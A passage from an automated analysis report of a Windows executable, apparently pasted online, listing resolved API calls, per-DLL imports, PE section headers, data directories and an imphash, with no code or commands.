- "kernel32.dll.GetCPInfo",
- "kernel32.dll.MultiByteToWideChar",
- "kernel32.dll.ExitProcess",
- "kernel32.dll.HeapSize",
- "kernel32.dll.RtlUnwindEx",
- "kernel32.dll.GetProcessHeap",
- "kernel32.dll.DeleteCriticalSection",
- "kernel32.dll.GetStartupInfoW",
- "kernel32.dll.GetModuleFileNameA",
- "kernel32.dll.QueryPerformanceCounter",
- "kernel32.dll.GetSystemTimeAsFileTime",
- "kernel32.dll.GetEnvironmentStringsW",
- "kernel32.dll.FreeEnvironmentStringsW",
- "kernel32.dll.RtlCaptureContext",
- "kernel32.dll.RtlLookupFunctionEntry",
- "kernel32.dll.RtlVirtualUnwind",
- "kernel32.dll.UnhandledExceptionFilter",
- "kernel32.dll.SetUnhandledExceptionFilter",
- "kernel32.dll.Sleep",
- "kernel32.dll.TerminateProcess",
- "kernel32.dll.TlsAlloc",
- "kernel32.dll.TlsGetValue",
- "kernel32.dll.TlsSetValue",
- "kernel32.dll.TlsFree",
- "kernel32.dll.EnterCriticalSection",
- "kernel32.dll.LeaveCriticalSection",
- "kernel32.dll.GetStringTypeW",
- "kernel32.dll.LCMapStringW",
- "kernel32.dll.HeapReAlloc",
- "kernel32.dll.OutputDebugStringW",
- "kernel32.dll.FlushFileBuffers",
- "kernel32.dll.GetConsoleCP",
- "user32.dll.wsprintfA",
- "kernel32.dll.InitializeCriticalSectionEx",
- "kernel32.dll.CreateEventExW",
- "kernel32.dll.CreateSemaphoreExW",
- "kernel32.dll.CreateThreadpoolTimer",
- "kernel32.dll.SetThreadpoolTimer",
- "kernel32.dll.WaitForThreadpoolTimerCallbacks",
- "kernel32.dll.CloseThreadpoolTimer",
- "kernel32.dll.CreateThreadpoolWait",
- "kernel32.dll.SetThreadpoolWait",
- "kernel32.dll.CloseThreadpoolWait",
- "kernel32.dll.FreeLibraryWhenCallbackReturns",
- "kernel32.dll.GetCurrentProcessorNumber",
- "kernel32.dll.GetLogicalProcessorInformation",
- "kernel32.dll.CreateSymbolicLinkW",
- "kernel32.dll.EnumSystemLocalesEx",
- "kernel32.dll.CompareStringEx",
- "kernel32.dll.GetDateFormatEx",
- "kernel32.dll.GetTimeFormatEx",
- "kernel32.dll.IsValidLocaleName",
- "kernel32.dll.LCMapStringEx",
- "kernel32.dll.GetTickCount64",
- "servicedll.dll.ServiceMain",
- "servicedll.dll.SvchostPushServiceGlobals",
- "termsrv.dll.ServiceMain",
- "termsrv.dll.SvchostPushServiceGlobals",
- "ole32.dll.CoFreeUnusedLibrariesEx",
- "ole32.dll.CoRegisterClassObject",
- "rpcrt4.dll.UuidFromStringW",
- "radarrs.dll.WdiDiagnosticModuleMain",
- "radarrs.dll.WdiHandleInstance",
- "radarrs.dll.WdiGetDiagnosticModuleInterfaceVersion",
- "advapi32.dll.DuplicateToken"
- ]
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "GetTempPathA",
- "address": "0x407070"
- },
- {
- "name": "GetFileSize",
- "address": "0x407074"
- },
- {
- "name": "GetModuleFileNameA",
- "address": "0x407078"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x40707c"
- },
- {
- "name": "CopyFileA",
- "address": "0x407080"
- },
- {
- "name": "ExitProcess",
- "address": "0x407084"
- },
- {
- "name": "SetEnvironmentVariableA",
- "address": "0x407088"
- },
- {
- "name": "Sleep",
- "address": "0x40708c"
- },
- {
- "name": "GetTickCount",
- "address": "0x407090"
- },
- {
- "name": "GetCommandLineA",
- "address": "0x407094"
- },
- {
- "name": "lstrlenA",
- "address": "0x407098"
- },
- {
- "name": "GetVersion",
- "address": "0x40709c"
- },
- {
- "name": "SetErrorMode",
- "address": "0x4070a0"
- },
- {
- "name": "lstrcpynA",
- "address": "0x4070a4"
- },
- {
- "name": "GetDiskFreeSpaceA",
- "address": "0x4070a8"
- },
- {
- "name": "GlobalUnlock",
- "address": "0x4070ac"
- },
- {
- "name": "GetWindowsDirectoryA",
- "address": "0x4070b0"
- },
- {
- "name": "SetCurrentDirectoryA",
- "address": "0x4070b4"
- },
- {
- "name": "GetLastError",
- "address": "0x4070b8"
- },
- {
- "name": "CreateDirectoryA",
- "address": "0x4070bc"
- },
- {
- "name": "CreateProcessA",
- "address": "0x4070c0"
- },
- {
- "name": "RemoveDirectoryA",
- "address": "0x4070c4"
- },
- {
- "name": "CreateFileA",
- "address": "0x4070c8"
- },
- {
- "name": "GetTempFileNameA",
- "address": "0x4070cc"
- },
- {
- "name": "ReadFile",
- "address": "0x4070d0"
- },
- {
- "name": "WriteFile",
- "address": "0x4070d4"
- },
- {
- "name": "lstrcpyA",
- "address": "0x4070d8"
- },
- {
- "name": "MoveFileExA",
- "address": "0x4070dc"
- },
- {
- "name": "lstrcatA",
- "address": "0x4070e0"
- },
- {
- "name": "GetSystemDirectoryA",
- "address": "0x4070e4"
- },
- {
- "name": "GetProcAddress",
- "address": "0x4070e8"
- },
- {
- "name": "GetExitCodeProcess",
- "address": "0x4070ec"
- },
- {
- "name": "WaitForSingleObject",
- "address": "0x4070f0"
- },
- {
- "name": "CompareFileTime",
- "address": "0x4070f4"
- },
- {
- "name": "SetFileAttributesA",
- "address": "0x4070f8"
- },
- {
- "name": "GetFileAttributesA",
- "address": "0x4070fc"
- },
- {
- "name": "GetShortPathNameA",
- "address": "0x407100"
- },
- {
- "name": "MoveFileA",
- "address": "0x407104"
- },
- {
- "name": "GetFullPathNameA",
- "address": "0x407108"
- },
- {
- "name": "SetFileTime",
- "address": "0x40710c"
- },
- {
- "name": "SearchPathA",
- "address": "0x407110"
- },
- {
- "name": "CloseHandle",
- "address": "0x407114"
- },
- {
- "name": "lstrcmpiA",
- "address": "0x407118"
- },
- {
- "name": "CreateThread",
- "address": "0x40711c"
- },
- {
- "name": "GlobalLock",
- "address": "0x407120"
- },
- {
- "name": "lstrcmpA",
- "address": "0x407124"
- },
- {
- "name": "FindFirstFileA",
- "address": "0x407128"
- },
- {
- "name": "FindNextFileA",
- "address": "0x40712c"
- },
- {
- "name": "DeleteFileA",
- "address": "0x407130"
- },
- {
- "name": "SetFilePointer",
- "address": "0x407134"
- },
- {
- "name": "GetPrivateProfileStringA",
- "address": "0x407138"
- },
- {
- "name": "FindClose",
- "address": "0x40713c"
- },
- {
- "name": "MultiByteToWideChar",
- "address": "0x407140"
- },
- {
- "name": "FreeLibrary",
- "address": "0x407144"
- },
- {
- "name": "MulDiv",
- "address": "0x407148"
- },
- {
- "name": "WritePrivateProfileStringA",
- "address": "0x40714c"
- },
- {
- "name": "LoadLibraryExA",
- "address": "0x407150"
- },
- {
- "name": "GetModuleHandleA",
- "address": "0x407154"
- },
- {
- "name": "GlobalAlloc",
- "address": "0x407158"
- },
- {
- "name": "GlobalFree",
- "address": "0x40715c"
- },
- {
- "name": "ExpandEnvironmentStringsA",
- "address": "0x407160"
- }
- ],
- "dll": "KERNEL32.dll"
- },
- {
- "imports": [
- {
- "name": "ScreenToClient",
- "address": "0x407184"
- },
- {
- "name": "GetSystemMenu",
- "address": "0x407188"
- },
- {
- "name": "SetClassLongA",
- "address": "0x40718c"
- },
- {
- "name": "IsWindowEnabled",
- "address": "0x407190"
- },
- {
- "name": "SetWindowPos",
- "address": "0x407194"
- },
- {
- "name": "GetSysColor",
- "address": "0x407198"
- },
- {
- "name": "GetWindowLongA",
- "address": "0x40719c"
- },
- {
- "name": "SetCursor",
- "address": "0x4071a0"
- },
- {
- "name": "LoadCursorA",
- "address": "0x4071a4"
- },
- {
- "name": "CheckDlgButton",
- "address": "0x4071a8"
- },
- {
- "name": "GetMessagePos",
- "address": "0x4071ac"
- },
- {
- "name": "LoadBitmapA",
- "address": "0x4071b0"
- },
- {
- "name": "CallWindowProcA",
- "address": "0x4071b4"
- },
- {
- "name": "IsWindowVisible",
- "address": "0x4071b8"
- },
- {
- "name": "CloseClipboard",
- "address": "0x4071bc"
- },
- {
- "name": "SetClipboardData",
- "address": "0x4071c0"
- },
- {
- "name": "EmptyClipboard",
- "address": "0x4071c4"
- },
- {
- "name": "PostQuitMessage",
- "address": "0x4071c8"
- },
- {
- "name": "GetWindowRect",
- "address": "0x4071cc"
- },
- {
- "name": "EnableMenuItem",
- "address": "0x4071d0"
- },
- {
- "name": "CreatePopupMenu",
- "address": "0x4071d4"
- },
- {
- "name": "GetSystemMetrics",
- "address": "0x4071d8"
- },
- {
- "name": "SetDlgItemTextA",
- "address": "0x4071dc"
- },
- {
- "name": "GetDlgItemTextA",
- "address": "0x4071e0"
- },
- {
- "name": "MessageBoxIndirectA",
- "address": "0x4071e4"
- },
- {
- "name": "CharPrevA",
- "address": "0x4071e8"
- },
- {
- "name": "DispatchMessageA",
- "address": "0x4071ec"
- },
- {
- "name": "PeekMessageA",
- "address": "0x4071f0"
- },
- {
- "name": "ReleaseDC",
- "address": "0x4071f4"
- },
- {
- "name": "EnableWindow",
- "address": "0x4071f8"
- },
- {
- "name": "InvalidateRect",
- "address": "0x4071fc"
- },
- {
- "name": "SendMessageA",
- "address": "0x407200"
- },
- {
- "name": "DefWindowProcA",
- "address": "0x407204"
- },
- {
- "name": "BeginPaint",
- "address": "0x407208"
- },
- {
- "name": "GetClientRect",
- "address": "0x40720c"
- },
- {
- "name": "FillRect",
- "address": "0x407210"
- },
- {
- "name": "DrawTextA",
- "address": "0x407214"
- },
- {
- "name": "EndDialog",
- "address": "0x407218"
- },
- {
- "name": "RegisterClassA",
- "address": "0x40721c"
- },
- {
- "name": "SystemParametersInfoA",
- "address": "0x407220"
- },
- {
- "name": "CreateWindowExA",
- "address": "0x407224"
- },
- {
- "name": "GetClassInfoA",
- "address": "0x407228"
- },
- {
- "name": "DialogBoxParamA",
- "address": "0x40722c"
- },
- {
- "name": "CharNextA",
- "address": "0x407230"
- },
- {
- "name": "ExitWindowsEx",
- "address": "0x407234"
- },
- {
- "name": "GetDC",
- "address": "0x407238"
- },
- {
- "name": "CreateDialogParamA",
- "address": "0x40723c"
- },
- {
- "name": "SetTimer",
- "address": "0x407240"
- },
- {
- "name": "GetDlgItem",
- "address": "0x407244"
- },
- {
- "name": "SetWindowLongA",
- "address": "0x407248"
- },
- {
- "name": "SetForegroundWindow",
- "address": "0x40724c"
- },
- {
- "name": "LoadImageA",
- "address": "0x407250"
- },
- {
- "name": "IsWindow",
- "address": "0x407254"
- },
- {
- "name": "SendMessageTimeoutA",
- "address": "0x407258"
- },
- {
- "name": "FindWindowExA",
- "address": "0x40725c"
- },
- {
- "name": "OpenClipboard",
- "address": "0x407260"
- },
- {
- "name": "TrackPopupMenu",
- "address": "0x407264"
- },
- {
- "name": "AppendMenuA",
- "address": "0x407268"
- },
- {
- "name": "EndPaint",
- "address": "0x40726c"
- },
- {
- "name": "DestroyWindow",
- "address": "0x407270"
- },
- {
- "name": "wsprintfA",
- "address": "0x407274"
- },
- {
- "name": "ShowWindow",
- "address": "0x407278"
- },
- {
- "name": "SetWindowTextA",
- "address": "0x40727c"
- }
- ],
- "dll": "USER32.dll"
- },
- {
- "imports": [
- {
- "name": "SelectObject",
- "address": "0x40704c"
- },
- {
- "name": "SetBkMode",
- "address": "0x407050"
- },
- {
- "name": "CreateFontIndirectA",
- "address": "0x407054"
- },
- {
- "name": "SetTextColor",
- "address": "0x407058"
- },
- {
- "name": "DeleteObject",
- "address": "0x40705c"
- },
- {
- "name": "GetDeviceCaps",
- "address": "0x407060"
- },
- {
- "name": "CreateBrushIndirect",
- "address": "0x407064"
- },
- {
- "name": "SetBkColor",
- "address": "0x407068"
- }
- ],
- "dll": "GDI32.dll"
- },
- {
- "imports": [
- {
- "name": "SHGetSpecialFolderLocation",
- "address": "0x407168"
- },
- {
- "name": "ShellExecuteExA",
- "address": "0x40716c"
- },
- {
- "name": "SHGetPathFromIDListA",
- "address": "0x407170"
- },
- {
- "name": "SHBrowseForFolderA",
- "address": "0x407174"
- },
- {
- "name": "SHGetFileInfoA",
- "address": "0x407178"
- },
- {
- "name": "SHFileOperationA",
- "address": "0x40717c"
- }
- ],
- "dll": "SHELL32.dll"
- },
- {
- "imports": [
- {
- "name": "AdjustTokenPrivileges",
- "address": "0x407000"
- },
- {
- "name": "RegCreateKeyExA",
- "address": "0x407004"
- },
- {
- "name": "RegOpenKeyExA",
- "address": "0x407008"
- },
- {
- "name": "SetFileSecurityA",
- "address": "0x40700c"
- },
- {
- "name": "OpenProcessToken",
- "address": "0x407010"
- },
- {
- "name": "LookupPrivilegeValueA",
- "address": "0x407014"
- },
- {
- "name": "RegEnumValueA",
- "address": "0x407018"
- },
- {
- "name": "RegDeleteKeyA",
- "address": "0x40701c"
- },
- {
- "name": "RegDeleteValueA",
- "address": "0x407020"
- },
- {
- "name": "RegCloseKey",
- "address": "0x407024"
- },
- {
- "name": "RegSetValueExA",
- "address": "0x407028"
- },
- {
- "name": "RegQueryValueExA",
- "address": "0x40702c"
- },
- {
- "name": "RegEnumKeyA",
- "address": "0x407030"
- }
- ],
- "dll": "ADVAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "ImageList_Create",
- "address": "0x407038"
- },
- {
- "name": "ImageList_AddMasked",
- "address": "0x40703c"
- },
- {
- "name": "ImageList_Destroy",
- "address": "0x407040"
- },
- {
- "name": null,
- "address": "0x407044"
- }
- ],
- "dll": "COMCTL32.dll"
- },
- {
- "imports": [
- {
- "name": "OleUninitialize",
- "address": "0x407284"
- },
- {
- "name": "OleInitialize",
- "address": "0x407288"
- },
- {
- "name": "CoTaskMemFree",
- "address": "0x40728c"
- },
- {
- "name": "CoCreateInstance",
- "address": "0x407290"
- }
- ],
- "dll": "ole32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x0027b04c",
- "overlay": {
- "size": "0x0025b058",
- "offset": "0x00019000"
- },
- "imagebase": "0x00400000",
- "reported_checksum": "0x0027b04c",
- "icon_hash": null,
- "entrypoint": "0x004031d6",
- "timestamp": "2018-12-15 22:24:22",
- "osversion": "4.0",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00006000",
- "entropy": "6.45",
- "raw_address": "0x00000400",
- "virtual_size": "0x00005f0d",
- "characteristics_raw": "0x60000020"
- },
- {
- "name": ".rdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00007000",
- "size_of_data": "0x00001400",
- "entropy": "5.00",
- "raw_address": "0x00006400",
- "virtual_size": "0x00001250",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x00009000",
- "size_of_data": "0x00000400",
- "entropy": "5.13",
- "raw_address": "0x00007800",
- "virtual_size": "0x0001a818",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".ndata",
- "characteristics": "IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x00024000",
- "size_of_data": "0x00000000",
- "entropy": "0.00",
- "raw_address": "0x00000000",
- "virtual_size": "0x00009000",
- "characteristics_raw": "0xc0000080"
- },
- {
- "name": ".rsrc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x0002d000",
- "size_of_data": "0x00011400",
- "entropy": "1.13",
- "raw_address": "0x00007c00",
- "virtual_size": "0x000112b8",
- "characteristics_raw": "0x40000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00007430",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x000000a0"
- },
- {
- "virtual_address": "0x0002d000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x000112b8"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00272c88",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x000013d0"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00007000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x00000298"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "3abe302b6d9a1256e6a915429af4ffd2",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": null,
- "imported_dll_count": 7,
- "versioninfo": []
- }
- }
Add Comment
Please, Sign In to add comment